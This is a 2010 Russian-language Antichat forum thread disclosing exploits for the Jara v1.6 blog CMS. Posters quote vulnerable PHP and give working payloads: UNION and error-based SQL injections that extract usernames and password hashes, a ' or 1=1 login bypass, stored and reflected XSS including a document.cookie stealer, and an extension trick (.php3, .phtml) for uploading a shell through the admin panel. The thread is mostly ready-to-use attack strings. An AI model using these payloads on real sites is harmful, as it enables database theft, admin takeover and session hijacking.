ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Blog Jara v1.6
  #1  
Старый 06.04.2010, 22:35
Аватар для nikp
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию Blog Jara v1.6

Jara v1.6 - 1st March 2010
http://jara.xantiz.com/download.html

category.php
PHP код:
        @$categoryid $_REQUEST["id"];
        
$category jara_get_category($categoryid);
        
jara_page_start("Category: ".$category["title"]);
        
$query "select * from jara_posts where categoryid = '$categoryid'"
SQL
mq=off
http://localhost/jarav16/category.php?id=-1'+union+select+1,version(),3+--+

----------------------

view.php
PHP код:
        session_start();
        
$id $_REQUEST["id"];
        if(isset(
$_POST["name"])) {
            
$name $_POST["name"];
            
$website $_POST["website"];
            
$comment $_POST["comment"];
            if(
substr($website04) != "http") {
                
$website "javascript:;";
            }
            
$name htmlspecialchars($name);
            
$comment strip_tags($comment);
            if(!
get_magic_quotes_gpc()) {
                
$name addslashes($name);
                
$website addslashes($website);
                
$comment addslashes($comment);
            }
            if(
strlen($name) > 64) {
                
$name substr($name060) . "...";
            }
            if(!empty(
$name) && !empty($comment) && $_POST["security"] == $_SESSION["result"]) {
            
                @
jara_db_query("insert into jara_comments values('0', '$id', '$name', '$website', '$comment', '".time()."')"); 
$id не фильтруется, при mq=off, можно провести SQL injection + acttive XSS.
Из-за капчи удобнее использовать FireFox + Tamper Data

http://localhost/jarav16/view.php?id=1
заполняем
Your Name:
Your Comment:
Security Question:
и в Tamper Data правим id
id=1','Guest','','Hi!<script>alert(121212);</script>',1270547738) -- 1

По адресу http://localhost/jarav16/view.php?id=1 имеем alert.


----------------------

page.php
PHP код:
        $id $_REQUEST["id"];
        
$result jara_db_query("select * from jara_pages where id = '$id' limit 1"); 
SQL
mq=off
http://localhost/jarav16/page.php?id=1'+union+select+1,username,unhex(hex(p assword)),4+from+jara_users+--+

Хеш хранится в формате SHA1

----------------------

В админке:
admin/upload.php
PHP код:
    if(is_writable("./../uploads/")) {
        if(
$_FILES["userfile"]["size"] > 0) {
            
$ext strtolower(end(explode("."basename($_FILES["userfile"]["name"]))));
            if(
$ext == "php" || $ext == "pl" || $ext == "exe" || $ext == "sh") {
                echo 
"<p>You're trying to upload an extension that's not allowed. Please upload it inside a container such as a compressed archive.</p>";
            }
            else {
                if(
$_FILES["userfile"]["error"] == 0) {
                    
$filename $_SESSION["jara_admin"] . "-" strtolower(preg_replace("/[^a-zA-Z0-9]/""-"basename($_FILES["userfile"]["name"]))) . "-" time() . "." strtolower(end(explode("."basename($_FILES["userfile"]["name"]))));
                    if(
move_uploaded_file($_FILES["userfile"]["tmp_name"], "./../uploads/$filename")) {
                        echo 
"<p><strong>Your file was uploaded to <a href=\"../uploads/$filename\">$filename</a> in the uploads directory.</strong></p>"
Shell
загружаются файлы с расширением .php3, .phtml

----------------------
 
Ответить с цитированием

  #2  
Старый 07.04.2010, 00:57
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

Jara v1.6 - 1st March 2010
XSS
/search.php
PHP код:
...try {
            
jara_page_start("Search results");
            
$term $_REQUEST["term"];
            if(!
get_magic_quotes_gpc()) {
                
$term addslashes($term);... 
PHP код:
...
echo 
"<p><strong>$num_rows</strong> results for <strong>".stripslashes($term)."</strong>.</p>";... 
Код HTML:
...<form action="search.php" method="post">
	<p>
		Search term: <input type="text" name="term" id="term" /><input type="submit" value="Go" />
	</p>
</form>...
Результат:
в поле term - xss

Последний раз редактировалось Strilo4ka; 07.04.2010 в 01:04..
 
Ответить с цитированием

  #3  
Старый 07.04.2010, 01:20
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

SQL inj - Класика жанра!
Входим в админку Jara v1.6

/login.php
PHP код:
require_once("include/jara_fns.php");
    if(isset(
$_POST["login_action"])) {
        try {
            
session_start();
            
$username $_POST["username"];
            
$password $_POST["password"];
            if(!
get_magic_quotes_gpc()) {
                
$username addslashes($username);
                
$password addslashes($password);
            }
            
$result jara_user_authenticate($_POST["username"], $_POST["password"]);
            if(
$result == false) {
                
jara_page_start("Login failure");
                echo 
"<p>\n";
                echo 
"\tYou have entered an invalid username or password.<br />\n";
                echo 
"\tPlease go back and try again.\n";
                echo 
"</p>";
                
jara_page_end();
                exit;
            }
            else {
                
header("Location: index.php");
            }
        }
        catch(
JaraDatabaseException $ex) {
            
jara_page_start("Login failure");... 
В функцию jara_user_authenticate вставляються $_POST["username"] и $_POST["password"].
Эта конструкция отдыхает:
PHP код:
...$username $_POST["username"];
            
$password $_POST["password"];
            if(!
get_magic_quotes_gpc()) {
                
$username addslashes($username);
                
$password addslashes($password);
            }... 

/include/auth_fns.php
PHP код:
...function jara_user_authenticate($username$password) {
        
$query "select * from jara_users where username = '$username' and password = SHA1('$password') limit 1";
        
$result jara_db_query($query);
        if(
$result->num_rows == 0) {
            return 
false;
        }
        else {
            
$row $result->fetch_assoc();
            
$_SESSION["jara_admin"] = $username;
            
$_SESSION["jara_permissions"] = array($row["permission_posts"], $row["permission_pages"], $row["permission_users"], $row["permission_upload"]);
            return 
true;
        }
    }... 
Условие:
mg=off

Результат:
<input type="text" id="username" name="username" width="20" />
в поле username ' or 1=1--[ ]

Последний раз редактировалось Strilo4ka; 07.04.2010 в 02:19..
 
Ответить с цитированием

  #4  
Старый 07.04.2010, 02:17
Аватар для Strilo4ka
Strilo4ka
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660

Репутация: 1148
По умолчанию

SQL inj
Jara v1.6

/admin/delete_category.php
PHP код:
...try {
        
$id $_REQUEST["id"];
        if(
$id == 1) {
            throw new 
JaraGeneralException("You cannot the delete the Uncategorized category.");
        }
        
$query "delete from jara_categories where categoryid = '$id'";
        
$result jara_db_query($query);... 

/include/db_fns.php

PHP код:
...function jara_db_connect() {
        global 
$jconfig$db_conn;
        if(
$db_conn == null) {
            @
$conn = new mysqli($jconfig->mysql_host$jconfig->mysql_username$jconfig->mysql_password$jconfig->mysql_db);
            if(
mysqli_connect_errno()) {
                throw new 
JaraDatabaseException(1mysqli_connect_errno(), mysqli_connect_error());
            }
            
$db_conn $conn;
            return 
$conn;
        }
        else {
            return 
$db_conn;
        }
    }
    
    function 
jara_db_query($query) {
        
$conn jara_db_connect();
        
$result $conn->query($query);
        if(
$conn->errno) {
            throw new 
JaraDatabaseException(2$conn->errno$conn->error$query);
        }
        if(
substr($query06) == "select" || substr($query04) == "show" || substr($query07) == "explain") {
            return 
$result;
        }
        else {
            return 
$conn->affected_rows;
        }
    } 
Условие:
mg=off

Результат:
http://localhost/jarav/admin/delete_category.php?id=1[sql]
http://localhost/jarav/admin/delete_category.php?id=1' or (select count(*) from (select 1 union select 2 union select 3)x group by concat(version(),floor(rand(0)*2)))--+

Также уязвимы другие скрипты!

Последний раз редактировалось Strilo4ka; 07.04.2010 в 02:22..
 
Ответить с цитированием

  #5  
Старый 09.04.2010, 02:49
Аватар для Red_EYEs
Red_EYEs
Познающий
Регистрация: 07.08.2009
Сообщений: 36
Провел на форуме:
257153

Репутация: 34
По умолчанию

http://xantiz.co.cc/blog/view.php?id=8%22%3E%3Cscript%3Ealert(document.cook ie)%3C/script%3E%3C%22 Если есть mq то можно и так
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Mi-Dia Blog Ctacok Сценарии/CMF/СMS 2 09.04.2010 22:25
RDS - ReduKToR Blog System ReduKToR PHP, PERL, MySQL, JavaScript 26 11.01.2010 07:42
Irokez Blog BLIND SQL-INJECTION, INCLUDE, ACTIVE XSS Corwin Сценарии/CMF/СMS 1 19.09.2009 14:01
MaxXBot v1.6 final 4ak ICQ 14 28.06.2009 12:41
Уязвимости InTerra Blog Machine Dimi4 Сценарии/CMF/СMS 0 08.01.2009 00:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ